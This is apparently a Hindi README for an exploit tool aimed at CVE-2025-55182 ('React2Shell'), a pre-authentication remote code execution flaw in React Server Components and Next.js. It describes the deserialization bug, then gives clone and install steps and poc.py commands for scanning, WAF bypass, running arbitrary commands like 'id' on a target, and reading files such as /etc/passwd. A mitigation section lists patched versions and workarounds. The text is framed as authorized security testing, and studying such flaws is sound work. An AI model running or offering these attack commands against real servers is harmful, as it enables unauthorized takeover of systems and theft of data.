
प्री-ऑथेंटिकेशन RCE एक्सप्लॉइट CVE-2025-55182 (React2Shell) के लिए जो React Server Components को लक्षित करता है। इसमें स्कैनिंग, OAST सत्यापन, WAF बायपास, कमांड निष्पादन और फ़ाइल पढ़ने की सुविधाएँ शामिल हैं।
प्री-ऑथेंटिकेशन रिमोट कोड एक्सीक्यूशन रिएक्ट सर्वर कंपोनेंट्स (RSC), नेक्स्ट.जेएस और संबंधित फ्रेमवर्क में।
CVE-2025-55182 (जिसे React2Shell भी कहा जाता है) रिएक्ट सर्वर कंपोनेंट्स (RSC) इकोसिस्टम को प्रभावित करने वाली एक गंभीर प्री-ऑथेंटिकेशन RCE कमजोरी है। एक अप्रमाणित हमलावर एक ही तैयार HTTP POST अनुरोध के साथ एक कमजोर सर्वर से पूरी तरह समझौता कर सकता है।
रिएक्ट सर्वर कंपोनेंट्स फंक्शन रेफरेंस और मॉड्यूल कॉल को क्रमबद्ध करने के लिए React Flight नामक एक कस्टम वायर फॉर्मेट का उपयोग करते हैं। कमजोरी पेलोड डिकोडिंग तंत्र में मौजूद है जो RSC एंडपॉइंट पर आने वाले POST अनुरोधों को संसाधित करता है।
जब सर्वर को एक React Flight पेलोड प्राप्त होता है, तो यह पर्याप्त सत्यापन के बिना सामग्री को डिसीरियलाइज़ करता है, हमलावर-नियंत्रित $$typeof फील्ड्स और मॉड्यूल रेफरेंस रिज़ॉल्यूशन पर भरोसा करता है। यह एक हमलावर को अनुमति देता है:
child_process, fs, net) को संदर्भित करने की$F (फंक्शन) टाइप मार्कर के माध्यम से फंक्शन कॉल को चेन करने की
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H = 10.0 Critical
id, whoami)।/etc/passwd, package.json)।git clone https://github.com/SentinelXofficial/CVE-2025-55182
cd CVE-2025-55182
pip install -r requirements.txt
उपयोग
मूल स्कैन
python3 poc.py -t https://target.com
python3 poc.py -t https://target.com --timeout 15
python3 poc.py -t https://target.com --json
OAST के साथ RCE सत्यापित करें
python3 poc.py -t https://target.com -m verify --oast your.oast.domain
पूर्ण बायपास परीक्षण
python3 poc.py -t https://target.com -m bypass --verbose
कमांड निष्पादित करें
python3 poc.py -t https://target.com -m exec --cmd "id"
python3 poc.py -t https://target.com -m exec --cmd "whoami" --timeout 20
फ़ाइलें पढ़ें
python3 poc.py -t https://target.com -m read --file "/etc/passwd"
python3 poc.py -t https://target.com -m read --file "/app/package.json"
प्रॉक्सी का उपयोग करें (जैसे Burp Suite)
python3 poc.py -t https://target.com --proxy http://127.0.0.1:8080
फ़ाइल संरचना
CVE-2025-55182/
├── README.md
├── poc.py
├── requirements.txt
└── exploit/
├── __init__.py
├── payloads.py
├── scanner.py
├── bypass.py
└── rce.py
शमन
पैच (अनुशंसित)
npm install [email protected]
npm install [email protected] [email protected]
अस्थायी कार्य-योजना
· सर्वर फंक्शन्स ("use server") को निष्क्रिय करें · Content-Type: text/x-component को ब्लॉक करने के लिए WAF नियम · RSC एंडपॉइंट के लिए नेटवर्क सेगमेंटेशन
संदर्भ
· https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components · https://www.cve.org/CVERecord?id=CVE-2025-55182 · https://nvd.nist.gov/vuln/detail/CVE-2025-55182
अस्वीकरण: केवल अधिकृत सुरक्षा परीक्षण के लिए।
लेखक: SentinelX · https://t.me/SentinelXsecurity
| पैकेज | कमजोर | पैच किया गया |
|---|
react-server-dom-webpack | 19.0.0 – 19.2.0 | ≥ 19.2.1 |
react-server-dom-parcel | 19.0.0 – 19.2.0 | ≥ 19.2.1 |
react-server-dom-turbopack | 19.0.0 – 19.2.0 | ≥ 19.2.1 |
next (13.x) | 13.3.0 – 13.5.x | ≥ 14.2.35 |
next (14.x) | 14.0.0 – 14.2.34 | ≥ 14.2.35 |
next (15.x) | 15.0.0+ (पैच देखें) | पैच किए गए रिलीज़ |